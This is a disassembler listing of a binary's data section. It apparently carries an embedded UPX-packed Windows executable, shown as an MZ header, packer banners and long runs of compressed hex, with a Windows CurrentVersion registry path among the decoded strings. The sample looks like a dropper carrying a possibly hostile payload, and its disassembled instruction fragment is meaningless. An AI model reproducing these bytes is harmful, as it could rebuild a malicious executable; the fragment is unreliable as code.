aMKJ db 'm:K!< j',0 ; DATA XREF: sub_40815F+102�o
aGV3s db 'g+V3S ',0 ; DATA XREF: sub_40815F+25F�o
aMzr db 'MZ',0 ; DATA XREF: sub_408581+96�o
db 3
dd 4000000h, 0FF000000h, 0B80000FFh, 0
dd 40000000h, 8 dup(0)
dd 0C8000000h, 0E000000h, 0EBA1Fh, 21CD09B4h, 0CD4C01B8h
dd 69685421h, 72702073h, 6172676Fh, 6163206Dh, 746F6E6Eh
dd 20656220h, 206E7572h, 44206E69h, 6D20534Fh, 2E65646Fh
dd 240A0D0Dh, 13h dup(0)
dd 50000000h, 4C000045h, 0F2000301h, 41CA88h, 0
dd 0E0000000h, 0B010F00h, 601h, 40h, 10h, 20000050h, 98h
dd 60h, 0A0h, 4000h, 10h, 4000002h, 0
dd 4000000h, 2 dup(0)
dd 0B0h, 10h, 2000000h, 0
dd 1000h, 10h, 1000h, 10h, 10000000h, 3 dup(0)
dd 0D80000A0h, 1Ch dup(0)
dd 55000000h, 305850h, 0
dd 50h, 10h, 0
dd 4, 2 dup(0)
dd 80000000h, 55E00000h, 315850h, 0
dd 40h, 60h, 3Ah, 4, 2 dup(0)
dd 40000000h, 55E00000h, 325850h, 0
dd 10h, 0A0h, 2, 3Eh, 2 dup(0)
dd 40000000h, 0C00000h, 42h dup(0)
db 0
db 0Ah, 0, 24h
aInfoThisFileIs db 'Info: This file is packed with the UPX executable packer http://u'
db 'px.tsx.org $',0Ah,0
aIdUpx1_07Copyr db '$Id: UPX 1.07 Copyright (C) 1996-2001 the UPX Team. All Rights Re'
db 'served. $',0Ah,0
db 55h
dd 0C215850h, 53090209h, 37A2620Ah, 695F94A8h, 1F000072h
dd 38h, 26000070h, 0E9380004h, 92087Eh, 905A4Dh, 43B03h
dd 0FFB2C832h, 7F40B8FFh, 0C8377FF9h, 0BA1F0E04h, 9B4000Eh
dd 1B821CDh, 6968544Ch, 0BF702073h, 72FFFFFDh, 6172676Fh
dd 6163206Dh, 746F6E6Eh, 20656220h, 206E7572h, 4F440269h
dd 0ED6D2053h, 6FFF6050h, 0D2E6564h, 0C7240A0Dh, 0ED134550h
dd 4CFF21DBh, 8A000201h, 0E041CA88h, 10B219Dh, 0E90F0806h
dd 0E022B37Eh, 0E018A400h, 25732510h, 0B6366F9h, 4501E02h
dd 96E67606h, 10341E0Ch, 5E592007h, 0E0A006F6h, 1757829h
dd 7C6FDDB2h, 3864D801h, 903F764Dh, 65742E37h, 0A22B7478h
dd 0CB6FFB20h, 1A00EB96h, 722EE004h, 636F6C65h, 7BECA6CCh
dd 23FB9E67h, 7942A226h, 703D9510h, 0DB303403h, 26669B2Ch
dd 0E22FFA12h, 691B3046h, 423BAE9Ah, 14032C0Bh, 34D36E5Eh
dd 2C4AB2CDh, 86706256h, 4D34D34Dh, 0D4C2AE9Ch, 0AE9AF2E2h
dd 2D083659h, 3C072818h, 0A69A6946h, 6C625469h, 69B28E78h
dd 0B49EA69Ah, 2F02E2C6h, 0CDB9D34Dh, 972E0AF4h, 4C3C2403h
dd 34D34D34h, 8A7C6A5Ch, 4D34DB9Ah, 0CEC0AAD3h, 0BF2EF2E6h
dd 3BA77659h, 3108724h, 0A6E42BF4h, 0D4A69A69h, 0ACB6C0CAh
dd 9A6D60BAh, 2B9098A2h, 66B27FD7h, 3E9B67Bh, 132F8A96h
dd 88033078h, 0D217FFFFh, 53813066h, 5754464Fh, 5C455241h
dd 7263694Dh, 666F736Fh, 0FFFFFFE5h, 69575C74h, 776F646Eh
dd 75435C73h, 6E657272h, 72655674h, 6E6F6973h, 7F68535Ch
dd 6CDB6FFBh, 28760C53h, 6A624F65h, 44746365h, 4C796110h
dd 6E64616Fh, 477015ADh, 39082B39h, 0FF3F4D67h, 6C2006A5h
dd 617041DBh, 656D7472h, 6E495C6Eh, 35EDFFAh, 23B6353h
dd 43003233h, 4449534Ch, 7ED9235Ch, 7B00BBE7h, 58383025h
dd 5D34042Dh, 361DBFAh, 0EC83237Dh, 0E89090FCh, 0F75706F0h
dd 0BAFBBDEh, 45375906h, 73746978h, 46DE827Ch, 694CFB60h
dd 79717262h, 6E686B3Bh, 6ED76C65h, 0B5DF67BFh, 791B545Fh
dd 0F60FD557h, 65DBFB7Dh, 677562B5h, 0C7697250h, 6567656Ch
dd 50305C23h, 2E1ED778h, 580F2B64h, 114F4C50h, 0D5B7376Fh
dd 72727033h, 6261C521h, 6673642Bh, 360DEC6Fh, 2E126F62h
dd 5CBB7973h, 35A0DD03h, 214964B8h, 723A5D5Ch, 0B10B7F64h
dd 74511A8Fh, 0EC1F335Fh, 704F5F5Ch, 57B21865h, 78566EFEh
dd 6E614844h, 0AC006E70h, 4D37FFB5h, 59542D2Dh, 4751574Bh
dd 0A4A4846h, 0ED61130Eh, 45411FF9h, 53415942h, 25464C48h
dd 967025Bh, 2020EF7Bh, 23120503h, 0EF7BEE30h, 3A0F32B0h
dd 3315040Bh, 0FC83601Eh, 4557677Fh, 464B574Ah, 4145574Ah
dd 9A13BBABh, 49444EFEh, 3445253h, 0FF971Ah, 0CB901FA2h
dd 0A60B6ECBh, 218D0F1Fh, 0BCB92191h, 232319A4h, 25352531h
dd 0D97FD36Dh
db 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 57740150h
push 24h
dec ch
imul ch
adc eax, 8D1E112Ch
inc ebp
lock push eax
or [eax], ebp
movzx eax, word ptr [ebp-6]
push eax
mov esi, ds:74F3CF20h
iret
; ---------------------------------------------------------------------------
dw 0FC0Ah
dd 0F8FE0450h, 9B66F4F6h, 8D50F7FBh, 755B7885h, 26C068F0h
dd 0CD10D638h, 17ECBB36h, 0B468FEB0h, 6A0C4F14h, 0FB7F1DB7h
dd 0F7599904h, 83DC5FF9h, 505205C2h, 5DD60C2Ah, 0BDCC1034h
dd 0C4832F73h, 50271538h, 8129B068h, 7776DB3Bh, 0A0BF8F5Bh
dd 28575080h, 14220F12h, 47736E52h, 3015A406h, 33087637h
dd 66E6B07Dh, 2C310B17h, 9868096Ah, 0ECE761D8h, 458830C9h
dd 0FDDB9F28h, 9372F66h, 23406879h, 866E0268h, 6C986E77h
dd 5E5F1260h, 0EF22C3C9h, 0E11BEF0Ah, 1D8B5318h, 336726A9h
dd 0FC7D89FFh, 0FCFF0AEFh, 0C083D3FFh, 2C895010h, 8BDC1C31h
dd 0F73B59F0h, 0DB23840Fh, 4937BAEFh, 0E4680A6Ah, 1D17563Ah
dd 8D056A02h, 0B7F00F46h, 817B16DFh, 0B418590Fh, 467640D3h
dd 0FED6C0Fh, 0C150973h, 12206857h, 0FB147524h, 3BDED93Fh
dd 90E75C7h, 26A0418h, 4D8D23EBh, 37F351F8h, 1CB3DB13h
dd 2A2BF811h, 1050215Eh, 3B6EEDC2h, 3FA0882h, 0A13E958h
dd 77FB6284h, 68F7DDh, 2E578330h, 0D88B1F4Ch, 7D74DF3Bh
dd 0D95C1468h, 481BB73Ah, 0A046810h, 440EF4B7h, 0BFBB6F60h
dd 0F88BF66Ah, 58F86858h, 0F45AC32Bh, 8D16F803h, 0F1F4BFC2h
dd 2BC87E89h, 89C103CBh, 22210B46h, 0DB86E7Eh, 0B05356E1h
dd 0E8104023h, 6FEEF633h, 43C2DFECh, 5350560Fh, 3C165656h
dd 974C68Ch, 8D17EE77h, 10EB389Bh, 0EB0431C7h, 0DF350807h
dd 250699ECh, 8B07111Ah, 0A1611B7Dh, 615B6006h, 60574651h
dd 0DF8E310Fh, 0FC96BB66h, 0F542461h, 0B4A31CAFh, 0FFFFDE0Eh
dd 7A12175h, 247621B9h, 0FBC06935h, 2B7F7C7Bh, 126851C8h
dd 0D998EDC2h, 0F71D582Bh, 2474BFD0h, 0DCF6FB2Dh, 5CC701C7h
dd 0CA75615h, 0BCC03350h, 0A1DD3306h, 609A6B0Ch, 3B6C5DA1h
dd 56D9131Ah, 1A206AD9h, 8DB43864h, 0F0DE089Dh, 3816ECA2h
dd 19D866B7h, 0C3522E30h, 1B6B02F8h, 10C7DBDAh, 6A13010Eh
dd 0B3D53710h, 0FCAD99E9h, 4BC61014h, 73A70228h, 0D8780DCDh
dd 514104FDh, 799D237Ch, 0E015117Ah, 0B5E07813h, 0CF1F9259h
dd 54111244h, 0D372E9DBh, 0F08B740Eh, 902F7483h, 64D9E803h
dd 5678325Bh, 351270A0h, 5721199Dh, 5E681B6Ch, 86EF8D1Fh
dd 33537D89h, 405357DBh, 0BDEE9064h, 83E70B6Fh, 566C745Bh
dd 6AA218BEh, 8C6667BFh, 0F087F53h, 5015B589h, 0D2D3EC57h
dd 0C0858A3Fh, 849F3674h, 9939D667h, 766CE6E1h, 20261374h
dd 0E3EB1584h, 359BE171h, 5BFC145Bh, 6157D989h, 3FB067FCh
dd 5FC38B5Eh, 8B048D5Bh, 5756085Dh, 0BEB7FE53h, 66590EFDh
dd 76C88B3Dh, 80D1443Fh, 745C1A3Ch, 6DC1810Dh, 1FAF6FFFh
dd 0EC77C915h, 664101EBh, 2373C83Bh, 17FFC91Bh, 0F002B4BEh
dd 78F12B6Dh, 148DC517h, 148A4708h, 594881Ah, 7B637661h
dd 6DC7186Dh, 2F7AEB7Eh, 0A618B7C6h, 5C644C90h, 9D560C24h
dd 0FFDDB7AFh, 247C8B57h, 7EDB8510h, 0AB0A6E19h, 1A6AC02Eh
dd 0FEE6787Dh, 61C280FFh, 463E1488h, 0E77CF33Bh, 1F2480h
dd 2109F32h, 0FFF8EC2Ch, 4D8B0C8Fh, 89564808h, 7550BC0Dh
dd 7BF0C677h, 51930B23h, 6FF898A1h, 0B64F8453h, 1BDA0BB0h
dd 4C711FCh, 1C75C24h, 0D676F67Bh, 7559D759h, 5468152Eh
dd 7ECBF013h, 3B4E1AB3h, 80B2709h, 610CEB04h, 0F1BDAFE1h
dd 29193C68h, 5959E0A9h, 0F7C35850h, 0C2702795h, 3189B0Ch
dd 63728917h, 1FB3DB3h, 26129468h, 0A88F59D1h, 0BD95B73Dh
dd 0FE934F85h, 5D940E01h, 0C9C9ADBFh, 575D9C64h, 9DF8F07Bh
dd 0BB6D937Ch, 6880A530h, 4EB1E19Fh, 0A359CDB4h, 0A43F00C0h
dd 5F5F7BACh, 353C7C31h, 0C702412h, 5B36E96h, 64BFA045h
dd 786657E5h, 0B755A05Ah, 9C26136Dh, 0FDB93D9Bh, 0E6EBEB05h
dd 680CFCE8h, 0C7580A34h, 1677166Ch, 33756A7Bh, 17E15D27h
dd 4F7E35Fh, 9FD8CDE8h, 0F18B76E6h, 9CFC18A2h, 135006C7h
dd 998C6541h, 6A1A1DE3h, 514C019h, 108D66B6h, 20B71026h
dd 816E741Fh, 57126D57h, 9B0C302h, 611EB56Fh, 7518C8D7h
dd 0C059350Bh, 7E89FF2Dh, 571CEB14h, 47095757h, 0B799BEACh
dd 7414463Eh, 1204699h, 0C68B1C16h, 0D77F685Fh, 83568DC6h
dd 0F6420F62h, 1082444h, 0DB66D820h, 5920D611h, 0A21B5E1Dh
dd 59BB6F3Dh, 5C8BEAFBh, 374689Dh, 768BD774h, 0ED95A3DBh
dd 9F68514h, 2A614656h, 0F6FB7F75h, 3BDF1CB7h, 8D0375F0h
dd 18515B71h, 2527FA83h, 75204539h, 0B035B206h, 4C183FDh
dd 0D003EB51h, 2184720h, 74B3F514h, 52AF10D6h, 0C25DB445h
dd 55EB61Ch, 0C4B870D8h, 10E41A7Ah, 0FF42BEE5h, 0C4681804h
dd 6A9A7A20h, 0D8C84789h, 6A00E4CEh, 0C8CC1808h, 202BD8D8h
dd 351016C4h, 3211D94Ch, 8D18D4D0h, 2C1A05B0h, 1B69140Bh
dd 7C1D19D8h, 0A045148Eh, 5E530800h, 0CC170A56h, 61605E12h
dd 0BB8FC4Dh, 0AC60466h, 0ABC04094h, 0EDC0B383h, 1170BDDDh
dd 8B057502h, 0CB3CEBEAh, 87CD0612h, 10AFBCC1h, 8A53A468h
dd 6276FC1Ah, 31EB7603h, 5D0C7D39h, 1E05D2BAh, 0EB17D019h
dd 0B81EE002h, 0F6DD6B5Bh, 575F30h, 91AE718Dh, 4AC57EDCh
dd 94218934h, 0AE08C20Eh, 98F1386Dh, 570880BFh, 0DB098E78h
dd 5E8BEF12h, 0F0C33108h, 0C3FDF402h, 49205C74h, 0C82C1474h
dd 659BA1C7h, 0C4660DA2h, 68DD4A7Ah, 6D46E25Ch, 0CEFE84Dh
dd 0FFBA4F51h, 26F13563h, 1BD8F7FCh, 0FC2456C0h, 5071E405h
dd 0C5D4839Bh, 9518A86Fh, 6AC503E5h, 0B191B7B3h, 3BC445FFh
dd 0C0940F75h, 68FB693h, 3EF9D91Fh, 8BCC264Ah, 17DE35B1h
dd 8959104Dh, 0A6910606h, 86F977CFh, 40883B9h, 10E048Ah
dd 270C4601h, 6D78FB5Dh, 0D518E710h, 4244C77Ah, 398D9D53h
dd 6AD94376h, 465945F6h, 43620657h, 6CB3EB2h, 6DF6AA3Dh
dd 4CB46C2Bh, 630CC9B5h, 565F0189h, 0DC62144Bh, 8B4C5B5Dh
dd 55A42041h, 4CDED6B4h, 6856E131h, 0A4CF3Fh, 6616475Dh
dd 74141588h, 6CEB6705h, 278CDC33h, 1DA9AAA6h, 1B633200h
dd 5E68039Ch, 6DB8040Fh, 6020612Fh, 73B60F66h, 648AFB05h
dd 97785EBBh, 61C10B98h, 13586812h, 0C228D052h, 642E21FBh
dd 896408A1h, 0CEA30725h, 2CDDC6C7h, 0E86589D2h, 240C29A5h
dd 0D757F427h, 0BBBB07Bh, 6850C303h, 76CC0AF8h, 14E4B40Bh
dd 2E0F4040h, 16D170E1h, 3861E0B9h, 522B34AFh, 0FBF192A9h
dd 6990B36Bh, 0DC1AFA9Bh, 930D9B94h, 90A15385h, 4F949343h
dd 0F8B6EB5Bh, 392FE416h, 0F7DB0842h, 2DC0BF45h, 5B3BC8DAh
dd 1E7C807Ch, 0C6057320h, 0E25A6D44h, 402E066Fh, 76FFE9EBh
dd 7575461Fh, 6E1BC3E0h, 381AE08h, 616480E0h, 5BAB1B9h
dd 0D450CC31h, 0DDA60C04h, 5FA246A6h, 0DA1E081Dh, 3CD80450h
dd 0D63CF3CFh, 0D2CECCD4h, 0D979E79Eh, 46B60A46h, 4050607h
dd 0F9EF9E6Ah, 4030818h, 0B6060102h, 71602353h, 8592156Ah
dd 13034058h, 0C95790E8h, 723EC498h, 9A8598BFh, 0AE2350C4h
dd 6F683F50h, 0D00ADC6Bh, 50420821h, 3E378659h, 83D91162h
dd 0EEBFFC4h, 0BE1696D2h, 758BC3C2h, 85598B0Ch, 0D3D907F1h
dd 1CBEFA37h, 0E07D83CFh, 0EE07000h, 841A4616h, 0F072CC96h
dd 70F20DB4h, 0FBCE718Ah, 0F0F468D8h, 833811C9h, 0F6ABFFC8h
dd 0A17C2CCDh, 0C55C09Fh, 7992D63Bh, 2E9EA50Dh, 0E677FCB4h
dd 0F286E41Dh, 4BFFFF7Ah, 8B135EBBh, 3BDCA6CEh, 8A2973CAh
dd 45883904h, 72303CC0h
dd 73393C09h, 778F4D1Dh, 6AC0F87Dh, 0B84B0A0Dh, 0E4797F74h
dd 0EBD8F18Bh, 0D0EB4106h, 850F390Fh, 1FEDBC28h, 0F64A8DBDh
dd 1548F13Bh, 0FFFD735Ch, 88D1DFh, 3B144E8Dh, 3B2A7DC1h
dd 8A2673C2h, 4D88380Ch, 2DF980BCh, 53B6B19Ah, 5954040Ah
dd 0DBDB77C9h, 3075DB37h, 83040925h, 1000D465h, 0A0D44D39h
dd 0DED966AFh, 568DBF76h, 1F75C23Bh, 0E8B8388Ah, 0C9A78D8h
dd 0A4190508h, 0CC36C143h, 0ADF8D6D8h, 81802ED4h, 62D0F651h
dd 0B02113Ch, 770CD08Dh, 20FD877h, 503E048Dh, 440E021Bh
dd 9E0F023Eh, 0D0498C63h, 1180D346h, 0D00AD85Ch, 0C40B1208h
dd 0B704C883h, 0C24AEE37h, 0A7F3205h, 57C01C4h, 5D7E0C04h
dd 0A0623789h, 31043EA1h, 0D405066Eh, 30E6EC5Ah, 31060775h
dd 32C1874h, 0AD1B0B30h, 46D70997h, 4A10D868h, 1418BB6Dh
dd 76E00A92h, 0A10B84EAh, 0C3C58830h, 239098C3h, 0DB5878E4h
dd 6919679Ch, 0B3D35DC5h, 80FDB05Dh, 2E9EBF3Ch, 4F048B66h
dd 10F2A02Fh, 7C35B97Eh, 3A097F0Dh, 3BC475E3h, 21C972C3h
dd 505BCB53h, 5335BB61h, 0C572A2Eh, 0C59C6247h, 0B2BF087Eh
dd 0EB590E7Ch, 0CB3BC975h, 0B0D33275h, 5D974C2Ch, 4DEFC65Dh
dd 3DBF74B3h, 47912475h, 640C1098h, 0CB3043B1h, 6F33949Dh
dd 0BBC3E9C2h, 4C5306CBh, 66900BBEh, 0CACC8419h, 0F2C47704h
dd 465C25Fh, 83DA0477h, 535330C4h, 74C0A6Ah, 0CACD6DFh
dd 0AB5325FFh, 46497A20h, 0CCB815CEh, 1BD9AF27h, 0A8E4AAD9h
dd 37D90C1Eh, 0A48D9190h, 0A3A8A800h, 0F1A36FF3h, 857C8366h
dd 0A071000h, 4B087530h, 0CEC3C30h, 0F75BE31h, 0C847FF9Eh
dd 5216C811h, 94AE6088h, 0B7FA2603h, 0FD4B466Eh, 12ECEB5Ch
dd 0C33DC862h, 8B7D6857h, 177E80C5h, 6D423A06h, 6D866DCEh
dd 1A1CA519h, 0C11E05F5h, 6CD26329h, 0D00C2293h, 6FABE824h
dd 365EFE0Dh, 3003F32Bh, 0EED1B89Bh, 0AFC11656h, 0E16F06Dh
dd 0A0DFFC6h, 72B54A14h, 202A2AB4h, 0B337096Fh, 3722A850h
dd 740BF090h, 0D1BF6E11h, 990F3928h, 0F8D1C22Bh, 0B1027E0Eh
dd 23EB6356h, 2C0D33F9h, 0CB7615ABh, 0D10F6FD1h, 70818DF9h
dd 57E275Fh, 0A17FB766h, 16EBACE9h, 279FEACh, 73B87D3Bh
dd 2BB8F841h, 1342F62Dh, 4AD90ECh, 7267501Fh, 0DBC4B62Dh
dd 9015F703h, 0C7D8E8D1h, 36DB1955h, 5543A3F3h, 470B0E16h
dd 0DF647D6Fh, 0F07FFF1Eh, 67CF73Bh, 0EB017E8Dh, 0C7814FBAh
dd 3BA6E2A4h, 1E0473FEh, 8BD5B6FCh, 5F4EACF7h, 752B00FCh
dd 0A17622ACh, 24A30C90h, 4078900h, 0FB5CD9A6h, 44789A4h
dd 807F9F5h, 8512B4C8h, 0A7A9CB52h, 3721C098h, 47322B1Ah
dd 10B11010h, 448E95BAh, 27A1A5C7h, 82AA32D5h, 6E401D45h
dd 60943618h, 6897573Ch, 192BB548h, 0B8A05B76h, 9C980E15h
dd 518E0C9Eh, 3E9193E9h, 5DCE35C7h, 142A2EE0h, 110B741Eh
dd 0F86A6E46h, 4850B5Bh, 8C8B5A9Ah, 532084B8h, 1F77B9CAh
dd 24D7715Bh, 0E85589DCh, 0BD3C8D1Ah, 0AD7E1704h, 2B43C969h
dd 28DA007h, 9F1B10A4h, 608501D4h, 0BB0300F5h, 358605FEh
dd 0B86857E0h, 731345F9h, 0ECC3085h, 3E4816B8h, 18DB5989h
dd 853913ECh, 41AFA262h, 0EA01A3A4h, 696BE0ACh, 646F7F72h
dd 5D0734FFh, 0C540BB4Eh, 9B82A012h, 314A95CDh, 27106897h
dd 0CE84EC50h, 0DE98C439h, 7211830Ch, 3D8BA5EEh, 0B912FE7Ah
dd 0C5A8DBA0h, 17CC052h, 0FB7B1BACh, 397517DBh, 37EBE518h
dd 1C8DE00Bh, 5C6C51D0h, 319B0F6h, 2001BE11h, 0DBFD7B0Fh
dd 6282BB1h, 1ABD6F1Bh, 0FFCC3815h, 0F9A3C4B5h, 0D04DCD99h
dd 0E1863CCh, 0DDDBB8Ch, 0EB711E0Bh, 1B30CB84h, 90D868D3h
dd 0B8B9EC9Dh, 4F996975h, 2610984Bh, 53530613h, 4C244F80h
dd 91EB4E40h, 4B7646Ah, 0EB5F4713h, 0C6439C87h, 0B86C2008h
dd 0BAE88C0Dh, 4263C7ABh, 2F5D346Ah, 0C70C11D7h, 59F460C6h
dd 0C87DAF63h, 500460B2h, 1223F0B8h, 1911EC09h, 0C861548Ch
dd 59C80BEEh, 8351C783h, 0C07CC84Dh, 78EBF160h, 5F1C2857h
dd 0F08EC604h, 0B1B6B5Ah, 330E8BACh, 99DAB74Ch, 3976D098h
dd 0A6C8B521h, 0CFB83351h, 893E8924h, 20FCBBA2h, 7DB88444h
dd 0AF642552h, 7E97D684h, 8C68347h, 0CF72F0C2h, 400A75Eh
dd 78D81DCCh, 74C4C75Fh, 75328D5h, 350CBFAEh, 0F474CD1h
dd 6A9F1128h, 8B67E866h, 0FF2C1113h, 5480825h, 0C8C8E791h
dd 10F80004h, 9AC16CF4h, 0CCECF091h, 27E81900h, 0E08C8CECh
dd 3D5100DCh, 7D1BF6F3h, 8F58D76h, 0E9811472h, 2D662D87h
dd 0EC7F6F16h, 73170185h, 8BC82BECh, 0E18B0CC4h, 48C8F18Bh
dd 3140C1B7h, 88804FC3h, 0C8869F8Ch, 0B8E9998Ch, 6F602960h
dd 1D77C9C9h, 88C8133Ah, 0F7284A00h, 930520F4h, 1680E119h
dd 3DCC397Eh, 1B34F7D0h, 5085A827h, 1B48206Fh, 97972EDFh
dd 32132B0Dh, 7410DC2Ch, 0CB35802Ah, 1C2F7C4Bh, 203A276Ch
dd 2FD6E5CBh, 58581114h, 765CDA30h, 2B805FACh, 11289813h
dd 8C2089E8h, 7202A657h, 0B5BFE59Fh, 29709E6h, 636D656Dh
dd 73997970h, 0FCB3B965h, 2BE7497h, 6C727473h, 2C56E65h
dd 0CFDD3BC3h, 6163096Bh, 0A631BA1Dh, 7FB76CD3h, 40333F3Fh
dd 50584159h, 0F5A4002h, 37FD320Fh, 490E3AF8h, 65AACA0Fh
dd 70656378h, 0DD685F74h, 5243D16Eh, 23DC172h, 0B3696F43h
dd 1BB2FDADh, 78435F49h, 75854678h, 0A3781D48h, 13AF0ADEh
dd 825F4845h, 42676F6Ch, 310B41BDh, 545243D0h, 0B67D9C7Bh
dd 4E49573Dh, 8F0C4501h, 418A6C03h, 33DEE0B6h, 0BAA0B79h
dword_4439A4 dd 0A8374324h db 76h, 42h, 0B5h
byte_4439AB db 0BFh ; DATA XREF: sub_44A577+3�o
dd 600D60BDh, 74DEDB54h, 0D3526574h, 0BA81056Fh, 7FFDB6B7h
dd 69725703h, 9662500Eh, 1B4D7373h, 0D7FB9B72h, 189C7EEh
db 47h
dword_4439D5 dd 644113F6h db 64h, 72h, 17h
dd 0D82E6711h
db 0A5h
dword_4439E1 dd 6C75213Ah dword_4439E5 dd 0D8095F4Fh db 0DAh, 0FFh, 56h
dd 72695603h, 6C617574h, 452A8441h, 1CC10A84h, 31026175h
dd 9BB5354Ch, 5433FFEAh, 436B6369h, 74E756Fh, 0B6064902h
dd 0D5AEED86h, 64656B2Bh, 6703632Eh, 4AEB5797h, 754D41C0h
dd 0F655550h, 364DEA93h, 0D1452FA1h, 61FDFEDAh, 5F038859h
dd 0DB636Ch, 1D5302F5h, 6DBC8046h, 6D6710A5h, 47014F0Dh
dd 0DD70E09Eh, 8F6F258Bh, 7970210Bh, 6BF6B6D5h, 795323A6h
dd 0BE44EB0Fh, 5AE6EC1Eh, 7316F10Ch, 32335B02h
db 4Eh, 0B6h
dword_443A76 dd 0D7026B2Bh dw 7530h
dd 0C8718C49h, 25CB68E6h, 68AD0665h, 70AA96DFh, 70B0A36Fh
dd 616E5318h, 0DD6B6170h, 1B6F2846h, 627F43D5h, 0DB784B1Eh
dd 65414482h, 4645DB6Dh, 0A57C33BBh, 2915EA4Eh, 140B5303h
dd 0EC16D837h, 1A2FDA00h, 2FD2306Eh, 0AACD86F9h, 5AC3ACD5h
dd 0F2DAD6C8h, 0A045614Ch, 0F7468511h, 453B9D66h, 4A1FAE76h
dd 0B460640Fh, 7F7AAEC2h, 0FB654400h, 1E886F49h, 76D6D567h
dd 31E5004Ch, 79651Fh, 0D5613780h, 0C887022Eh, 868D965Dh
dd 92453C13h, 46612365h, 0D8016004h, 6C255368h, 0D4CF7542h
dd 2A900F8h, 0EB721C49h, 6C735B2Dh, 0A7043ADh, 0C2694C43h
dd 86C9BD53h, 5F3D2173h, 8C28876h, 79D5284Bh, 36BBF19Fh
dd 501C68F4h, 7D18FFh, 532EDB45h, 694508F6h, 685C6469h
dd 8DB76A9Fh, 6C276742h, 26794214h, 0D1CE6ECAh, 27284F55h
dd 30787A69h
db 3, 9
dword_443B72 dd 459B5563h dw 0B00Fh
dd 0F8DFE96Ah, 52454B00h, 0BC74C3Ch, 0D870A95Dh, 82635D02h
dd 187B7166h, 80258CC2h, 0C371D6FCh, 61789E9h, 0D0726765h
dd 36ED2564h, 0E3007C3Bh, 3F0CAF00h, 0B65A5355h, 5761E176h
dd 6AF9001Ch, 6BB3EE75h, 9C009DB0h, 7D73B714h, 0C936C301h
dd 75126FADh, 75965670h, 1621EA7h, 3D01A869h, 0F0528B34h
dd 20D48E16h, 0A9654BC6h, 36440DF8h, 3034CC43h, 0D8CC1F9Ah
dd 0EC3BDFD6h, 44411220h, 83496F56h, 6179424Bh, 556F4325h
dd 856C1127h, 300F6667h, 0F547547h, 36B0D39h, 6F1F49D6h
dd 60AE3C91h, 0CE008451h, 50DFD6FFh, 335C333Fh, 336C3360h
dd 80337C3Ah, 90338C33h, 0FF06FFFFh, 0B933AF33h, 0EB33C433h
dd 3409341Bh, 34313422h, 345A3453h, 34843479h, 0FFFFFFFFh
dd 34BB34A8h, 34F634CCh, 352B3506h, 353B3531h, 355D354Eh
dd 3588357Dh, 3593358Eh, 35A7359Dh, 0FFFFFFFFh, 35D335B4h
dd 35F535EAh, 36353610h, 36483640h, 3661365Bh, 36773666h
dd 36973690h, 36B236ABh, 0FFFFFFFFh, 36D136C2h, 370436E6h
dd 37233718h, 3739372Ah, 37683753h, 37C2376Fh, 37F937F2h
dd 38B73869h, 0FFFFFF56h, 38DE38CCh, 38FF38EBh, 39503929h
dd 3980395Ch, 399A3994h, 39B839A5h, 0FFFFFFA5h, 0CB39C5FFh
dd 0D839D239h, 0E539E039h, 0D39F839h, 4F3A483Ah, 923A843Ah
dd 0E43AA53Ah, 3F3AED3Ah, 0F16FFFFFh, 273C123Bh, 3C383C0Eh
dd 3C5E3C3Fh, 3CB13CA3h, 3CF23CBEh, 3DC73D04h, 0FFFFFFFFh
dd 3DF53DE5h, 3E183E13h, 3E3A3E34h, 3E7F3E79h, 3EE93E98h
dd 3F573F50h, 3F6B3F64h, 3F863F7Bh, 0FFC34A3Fh, 3FCB3F98h
dd 3FEC3FD1h, 200F3FF1h, 0FE302A73h, 0B0FFFFFFh, 0A31B531h
dd 2A332033h, 0B0333733h, 5333B533h, 15356635h, 33362C36h
dd 57364A36h, 0FFFFDC36h, 0ECC3EFFFh, 0B4375836h, 0F437C837h
dd 3637FA37h, 47384038h, 87385938h, 0A0389938h, 0FF38A638h
dd 0ACFFFBBFh, 0B838B238h, 0C438BE38h, 0D838D238h, 283922D1h
dd 3D392E39h, 68395139h, 4398439h, 90E35840h, 0F0AC39h
dd 8A128192h, 65F7D0FFh, 0F75ABFFh, 6E3149D0h, 0BF031ABEh
dd 0DD07151Ah, 687CDF37h, 361AAD4Dh, 1AB44D37h, 0B868F63Fh
dd 5227301Ah, 0E714644Fh, 7686369h, 35F70005h, 7CE4B9B5h
dd 40014072h, 0EB079F31h, 139ABE02h, 2C31A097h, 0D8C80B0Dh
dd 3F601E9h, 0C5192704h, 3BA0F27Bh, 725FECAh, 538A31DBh
dd 603A307Ch, 0C2689F34h, 492BDCEh, 4F2338E0h, 28A70330h
dd 1CC840BCh, 7676A983h, 5407A32Ah, 7602B29h, 628C2DA2h
dd 2B3B9207h, 61525E64h, 0FBE76174h, 43530780h, 0C8073146h
dd 0DD65B2D8h, 7AF5458h, 4F072C23h, 1D0A8DB3h, 0D19F2EE2h
dd 0A323EB00h, 80F37D98h, 0E13B5707h, 0B27F1460h, 7C00302h
dd 314651EDh, 332E27Fh, 0CB36CEEBh, 0F618330Ah, 0BC01332h
dd 69A603AAh, 0DE94A69Ah
db 60h
dword_443EA1 dd 0B2C8384Ah db 0EBh, 9Ah, 0FAh
dd 8B267F10h, 0D344337Ah, 0C6375D34h, 9603B23Bh, 0D3656A7Eh
dd 3E5E4D34h, 31FE162Eh, 9A69A69Ah, 0A6B8D0E6h, 30E3748Ch
dd 315C6D96h, 27025B93h, 0A40414DFh, 5351264Ah, 2EFFC983h
dd 0F954BF72h, 0BB5051C1h, 0B75F2020h, 0FC821FEAh, 8B2856C5h
dd 0B9C5FC7Dh, 8297D488h, 0C0332E77h, 8B5DABF3h, 3D032835h
dd 0A06E89B7h, 8845E488h, 8C1405E8h, 8EE936Ch, 0D41DE40Eh
dd 2321C8D8h, 0DCD4D887h, 0C8763278h, 0DC0EE0E0h, 92E4EC05h
dd 0D6E123EFh, 0FFF4FC0Ah, 839EC1B9h, 4133CC0h, 0FC4EA6ACh
dd 8239F633h, 75F772B7h, 144875F8h, 2205FC68h, 0D6646A38h
dd 0C83DF7CCh, 221B22C4h, 3BEF1813h, 1634D933h, 1474141Ch
dd 0F3870FFh, 82BAFB50h, 9FC8B16h, 0A214EA10h, 0CCBE7C00h
dd 4BF8D8E0h, 86192EE1h, 105F7DCCh, 0CA8EB70Fh, 0AC763F01h
dd 282A2170h, 7F1BE8Dh, 1274C73Bh, 0FFEEF6C8h, 8B04508Bh
dd 0A895008h, 1B045189h, 0E8EB5E44h, 8FB7D41Dh, 8D3F723Dh
dd 831FC458h, 192C603Dh, 6F417504h, 8D0CF15Bh, 2BA3C4Eh
